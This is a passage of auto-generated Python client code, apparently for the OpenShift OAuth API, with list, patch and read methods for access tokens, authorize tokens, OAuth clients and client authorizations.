:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1OAuthAccessTokenList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['pretty', 'field_selector', 'label_selector', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_oauth_openshift_io_v1_o_auth_access_token" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/apis/oauth.openshift.io/v1/oauthaccesstokens'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
if 'watch' in params:
query_params['watch'] = params['watch']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1OAuthAccessTokenList',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_oauth_openshift_io_v1_o_auth_authorize_token(self, **kwargs):
"""
list or watch objects of kind OAuthAuthorizeToken
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_oauth_openshift_io_v1_o_auth_authorize_token(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1OAuthAuthorizeTokenList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(**kwargs)
else:
(data) = self.list_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(**kwargs)
return data
def list_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(self, **kwargs):
"""
list or watch objects of kind OAuthAuthorizeToken
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1OAuthAuthorizeTokenList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['pretty', 'field_selector', 'label_selector', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_oauth_openshift_io_v1_o_auth_authorize_token" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/apis/oauth.openshift.io/v1/oauthauthorizetokens'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
if 'watch' in params:
query_params['watch'] = params['watch']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1OAuthAuthorizeTokenList',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_oauth_openshift_io_v1_o_auth_client(self, **kwargs):
"""
list or watch objects of kind OAuthClient
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_oauth_openshift_io_v1_o_auth_client(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1OAuthClientList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_oauth_openshift_io_v1_o_auth_client_with_http_info(**kwargs)
else:
(data) = self.list_oauth_openshift_io_v1_o_auth_client_with_http_info(**kwargs)
return data
def list_oauth_openshift_io_v1_o_auth_client_with_http_info(self, **kwargs):
"""
list or watch objects of kind OAuthClient
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_oauth_openshift_io_v1_o_auth_client_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1OAuthClientList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['pretty', 'field_selector', 'label_selector', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_oauth_openshift_io_v1_o_auth_client" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/apis/oauth.openshift.io/v1/oauthclients'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
if 'watch' in params:
query_params['watch'] = params['watch']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1OAuthClientList',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_oauth_openshift_io_v1_o_auth_client_authorization(self, **kwargs):
"""
list or watch objects of kind OAuthClientAuthorization
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_oauth_openshift_io_v1_o_auth_client_authorization(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1OAuthClientAuthorizationList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(**kwargs)
else:
(data) = self.list_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(**kwargs)
return data
def list_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(self, **kwargs):
"""
list or watch objects of kind OAuthClientAuthorization
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1OAuthClientAuthorizationList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['pretty', 'field_selector', 'label_selector', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_oauth_openshift_io_v1_o_auth_client_authorization" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/apis/oauth.openshift.io/v1/oauthclientauthorizations'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
if 'watch' in params:
query_params['watch'] = params['watch']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1OAuthClientAuthorizationList',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_oauth_openshift_io_v1_o_auth_access_token(self, name, body, **kwargs):
"""
partially update the specified OAuthAccessToken
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.patch_oauth_openshift_io_v1_o_auth_access_token(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the OAuthAccessToken (required)
:param UnversionedPatch body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1OAuthAccessToken
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.patch_oauth_openshift_io_v1_o_auth_access_token_with_http_info(name, body, **kwargs)
else:
(data) = self.patch_oauth_openshift_io_v1_o_auth_access_token_with_http_info(name, body, **kwargs)
return data
def patch_oauth_openshift_io_v1_o_auth_access_token_with_http_info(self, name, body, **kwargs):
"""
partially update the specified OAuthAccessToken
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.patch_oauth_openshift_io_v1_o_auth_access_token_with_http_info(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the OAuthAccessToken (required)
:param UnversionedPatch body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1OAuthAccessToken
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_oauth_openshift_io_v1_o_auth_access_token" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `patch_oauth_openshift_io_v1_o_auth_access_token`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `patch_oauth_openshift_io_v1_o_auth_access_token`")
collection_formats = {}
resource_path = '/apis/oauth.openshift.io/v1/oauthaccesstokens/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json-patch+json', 'application/merge-patch+json', 'application/strategic-merge-patch+json'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1OAuthAccessToken',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_oauth_openshift_io_v1_o_auth_authorize_token(self, name, body, **kwargs):
"""
partially update the specified OAuthAuthorizeToken
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.patch_oauth_openshift_io_v1_o_auth_authorize_token(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the OAuthAuthorizeToken (required)
:param UnversionedPatch body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1OAuthAuthorizeToken
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.patch_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(name, body, **kwargs)
else:
(data) = self.patch_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(name, body, **kwargs)
return data
def patch_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(self, name, body, **kwargs):
"""
partially update the specified OAuthAuthorizeToken
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.patch_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the OAuthAuthorizeToken (required)
:param UnversionedPatch body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1OAuthAuthorizeToken
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_oauth_openshift_io_v1_o_auth_authorize_token" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `patch_oauth_openshift_io_v1_o_auth_authorize_token`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `patch_oauth_openshift_io_v1_o_auth_authorize_token`")
collection_formats = {}
resource_path = '/apis/oauth.openshift.io/v1/oauthauthorizetokens/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json-patch+json', 'application/merge-patch+json', 'application/strategic-merge-patch+json'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1OAuthAuthorizeToken',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_oauth_openshift_io_v1_o_auth_client(self, name, body, **kwargs):
"""
partially update the specified OAuthClient
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.patch_oauth_openshift_io_v1_o_auth_client(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the OAuthClient (required)
:param UnversionedPatch body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1OAuthClient
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.patch_oauth_openshift_io_v1_o_auth_client_with_http_info(name, body, **kwargs)
else:
(data) = self.patch_oauth_openshift_io_v1_o_auth_client_with_http_info(name, body, **kwargs)
return data
def patch_oauth_openshift_io_v1_o_auth_client_with_http_info(self, name, body, **kwargs):
"""
partially update the specified OAuthClient
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.patch_oauth_openshift_io_v1_o_auth_client_with_http_info(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the OAuthClient (required)
:param UnversionedPatch body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1OAuthClient
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_oauth_openshift_io_v1_o_auth_client" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `patch_oauth_openshift_io_v1_o_auth_client`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `patch_oauth_openshift_io_v1_o_auth_client`")
collection_formats = {}
resource_path = '/apis/oauth.openshift.io/v1/oauthclients/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json-patch+json', 'application/merge-patch+json', 'application/strategic-merge-patch+json'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1OAuthClient',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_oauth_openshift_io_v1_o_auth_client_authorization(self, name, body, **kwargs):
"""
partially update the specified OAuthClientAuthorization
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.patch_oauth_openshift_io_v1_o_auth_client_authorization(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the OAuthClientAuthorization (required)
:param UnversionedPatch body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1OAuthClientAuthorization
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.patch_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(name, body, **kwargs)
else:
(data) = self.patch_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(name, body, **kwargs)
return data
def patch_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(self, name, body, **kwargs):
"""
partially update the specified OAuthClientAuthorization
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.patch_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the OAuthClientAuthorization (required)
:param UnversionedPatch body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1OAuthClientAuthorization
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_oauth_openshift_io_v1_o_auth_client_authorization" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `patch_oauth_openshift_io_v1_o_auth_client_authorization`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `patch_oauth_openshift_io_v1_o_auth_client_authorization`")
collection_formats = {}
resource_path = '/apis/oauth.openshift.io/v1/oauthclientauthorizations/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json-patch+json', 'application/merge-patch+json', 'application/strategic-merge-patch+json'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1OAuthClientAuthorization',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def read_oauth_openshift_io_v1_o_auth_access_token(self, name, **kwargs):
"""
read the specified OAuthAccessToken
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.read_oauth_openshift_io_v1_o_auth_access_token(name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the OAuthAccessToken (required)
:param str pretty: If 'true', then the output is pretty printed.
:param bool exact: Should the export be exact. Exact export maintains cluster-specific fields like 'Namespace'
:param bool export: Should this value be exported. Export strips fields that a user can not specify.
:return: V1OAuthAccessToken
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.read_oauth_openshift_io_v1_o_auth_access_token_with_http_info(name, **kwargs)
else:
(data) = self.read_oauth_openshift_io_v1_o_auth_access_token_with_http_info(name, **kwargs)
return data
def read_oauth_openshift_io_v1_o_auth_access_token_with_http_info(self, name, **kwargs):
"""
read the specified OAuthAccessToken
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.read_oauth_openshift_io_v1_o_auth_access_token_with_http_info(name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the OAuthAccessToken (required)
:param str pretty: If 'true', then the output is pretty printed.
:param bool exact: Should the export be exact. Exact export maintains cluster-specific fields like 'Namespace'
:param bool export: Should this value be exported. Export strips fields that a user can not specify.
:return: V1OAuthAccessToken
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'pretty', 'exact', 'export']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_oauth_openshift_io_v1_o_auth_access_token" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `read_oauth_openshift_io_v1_o_auth_access_token`")
collection_formats = {}
resource_path = '/apis/oauth.openshift.io/v1/oauthaccesstokens/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'exact' in params:
query_params['exact'] = params['exact']
if 'export' in params:
query_params['export'] = params['export']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1OAuthAccessToken',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def read_oauth_openshift_io_v1_o_auth_authorize_token(self, name, **kwargs):
"""
